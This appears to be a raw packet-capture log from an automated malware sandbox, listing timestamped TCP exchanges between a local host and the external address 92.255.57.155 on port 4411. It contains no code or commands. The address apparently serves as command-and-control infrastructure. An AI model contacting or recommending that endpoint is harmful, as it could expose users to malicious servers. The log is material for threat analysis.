Dec 29, 2024 09:50:06.839317083 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.869260073 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.918947935 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.000582933 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.000734091 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.045872927 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.119959116 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.120151997 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.169233084 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.239451885 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.239764929 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.256109953 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.372081041 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.379455090 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.379532099 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.540606976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.540764093 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.569545031 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.660075903 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:07.660212994 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:07.779562950 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.012970924 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:08.132405996 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.132488012 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:08.251878977 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.251926899 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:08.371341944 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.464730024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.473939896 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:08.593468904 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.675163031 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.803910971 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.804074049 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:08.887654066 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:08.913203955 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:09.032444954 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:09.043551922 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:09.162895918 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:09.163558006 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:09.282891989 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:09.622287035 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:09.741683006 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:09.966222048 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.074004889 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.085452080 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.085689068 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.204987049 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.205034018 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.324265957 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.324311018 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.417933941 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.417999983 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.443547010 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.443623066 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.537249088 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.538983107 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.562908888 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.658247948 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.658303976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.715280056 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.715337992 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.777581930 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.777659893 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.834630966 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.868984938 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.944556952 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:10.944601059 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:10.967271090 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.064239979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.071299076 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.107628107 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.190685034 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.190763950 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.219085932 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.278309107 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.356545925 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.357021093 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.401213884 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.476404905 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.477488041 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.520797968 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.596820116 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.597884893 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.611604929 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.668929100 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.760531902 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:11.760591984 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:11.879897118 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.075531006 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.194813967 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.194858074 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.314091921 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.544306993 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.549465895 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.663727999 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.663779020 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.759741068 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.759812117 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.783119917 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.783217907 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.874434948 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.874502897 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.879102945 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.879168987 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:12.902545929 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.993896961 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:12.998591900 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.089705944 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.092410088 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:13.204806089 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.211709976 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.215337992 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:13.334676981 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.342989922 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.347191095 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:13.414813042 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.508620024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.508742094 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:13.545362949 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.628056049 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:13.630052090 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:13.749332905 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.153708935 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:14.273086071 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.273191929 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:14.392672062 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.392724991 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:14.512075901 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.544646025 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:14.605324030 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.664025068 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.664089918 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:14.783442974 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.815829992 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.817332029 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:14.874751091 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.980631113 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:14.980694056 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:15.026043892 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:15.100255013 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:15.106875896 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:15.147034883 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:15.226267099 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:15.228323936 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:15.347639084 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:15.638252974 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:15.757664919 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.075594902 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.090356112 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.168950081 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.194992065 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.195045948 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.314344883 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.314402103 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.433883905 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.466228962 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.527220964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.527326107 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.585588932 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.585638046 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.646519899 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.646572113 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.704993963 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.705046892 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.737454891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.737554073 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.796175957 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.796283007 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.856894016 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.856975079 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:16.947787046 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:16.947832108 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.032578945 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.032635927 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.067038059 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.067356110 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.173017979 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.192559004 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.195384979 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.195537090 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.195657015 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.314681053 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.315663099 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.318960905 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.372420073 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.405987978 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.406232119 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.476531982 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.476686001 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.525640011 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.529253006 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.575206041 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.636617899 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:17.639427900 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:17.758776903 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.122545958 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.241813898 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.241869926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.361226082 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.361274004 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.480571985 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.480621099 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.574130058 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.574183941 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.599843979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.599894047 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.693752050 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.693799973 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.719156981 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.719208002 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.784636974 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.814253092 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.814311028 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:18.838483095 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.904468060 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.933542013 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:18.933617115 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:19.024857998 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.052819967 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.053030968 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:19.144388914 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.172533035 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.172728062 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:19.263348103 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.292210102 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.292356968 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:19.383101940 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.412059069 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:19.412322044 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:19.531922102 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.357356071 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:20.476774931 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.476834059 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:20.596086025 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.596149921 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:20.715612888 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.717247963 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:20.809031963 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.836565971 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.837412119 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:20.956690073 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:20.956737995 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.047339916 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.047405958 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.075944901 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.076004982 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.166724920 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.166800976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.167105913 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.244486094 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.245307922 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.286185980 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.286423922 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.372085094 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.377397060 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.381298065 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.496953964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.497174025 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.539000988 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.539310932 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.656721115 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.656883955 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.658648968 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.707287073 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.776388884 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.777261019 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.791441917 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.872106075 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:21.940613985 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:21.940751076 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:22.060214996 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:22.413793087 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:22.416425943 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:22.535887957 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:22.535990953 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:22.655343056 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:22.888077974 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.007608891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.007654905 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.032242060 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.032320023 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.151725054 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.153285980 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.218153000 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.320537090 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.321306944 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.362255096 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.440561056 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.440756083 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.483258009 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.560050964 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.560131073 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.651201963 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.679605007 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.679769039 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.770698071 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.773294926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.799022913 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.801287889 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:23.892854929 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:23.920640945 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.138212919 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.257579088 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.257637978 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.337402105 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.376980066 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.377032042 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.496347904 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.496398926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.590080023 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.590132952 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.615786076 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.615840912 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.709487915 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.709729910 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.735183954 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.826184988 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.829087973 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.829138994 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.920018911 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.920073986 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:24.948651075 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:24.948705912 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.039447069 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.039575100 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.124588966 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.124769926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.159107924 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.244127035 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.244381905 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.249974966 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:25.372306108 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:25.404567957 CET	4411	49730	92.255.57.155	192.168.2.4
